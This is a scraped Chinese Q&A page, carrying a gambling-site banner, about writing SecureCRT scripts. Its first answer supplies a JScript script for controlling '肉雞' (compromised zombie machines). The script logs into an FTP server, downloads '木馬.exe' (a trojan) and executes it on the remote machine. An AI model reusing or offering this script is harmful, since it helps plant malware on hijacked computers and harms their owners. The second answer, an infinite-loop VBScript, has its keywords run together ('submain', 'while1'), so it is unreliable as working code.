當前位置:ag真人国际官网-ag旗舰厅官方网站 » 編程軟體 » crt打開腳本如何編寫
crt打開腳本如何編寫-ag真人国际官网
發布時間: 2024-07-11 07:16:30
⑴ 求securecrt腳本登陸肉雞
#$language="jscript"
#$interface="1.0"
if(crt.session.connected)
{
crt.screen.waitforstring (">");
crt.screen.send("ftp ftp地址\r");
crt.screen.waitforstring (":");
crt.screen.send("帳號\r");
crt.screen.waitforstring (":");
crt.screen.send("密碼\r");
crt.screen.waitforstring (".");
crt.screen.send("get 木馬.exe c:\\木馬.exe\r");
crt.screen.waitforstring (">");
crt.screen.send("bye\r");
crt.screen.waitforstring (">");
crt.screen.send("c:\\木馬.exe\r");
crt.screen.waitforstring (">");
crt.screen.send("c:\\木馬.exe\r");
}
這樣回自動登陸 ftp 下載木馬 然後 退出ftp 運行木馬`..
再者之前必須要 設置正確securecrt .. ...要將securecrt設置為開啟先登陸telnet 模式..還必須 讓它自動發送回車..帳號密碼也得設置...
⑵ securecrt腳本編寫個無限循環語句、
#$language="vbscript"
#$interface="1.0"
submain
while1
crt.screen.send"1"&vbcr
crt.sleep1000
wend
endsub
以上代碼保存為test.vbs,然後securecrt菜單中選擇「script」 > "run...",選擇此腳本文件運行。
熱點內容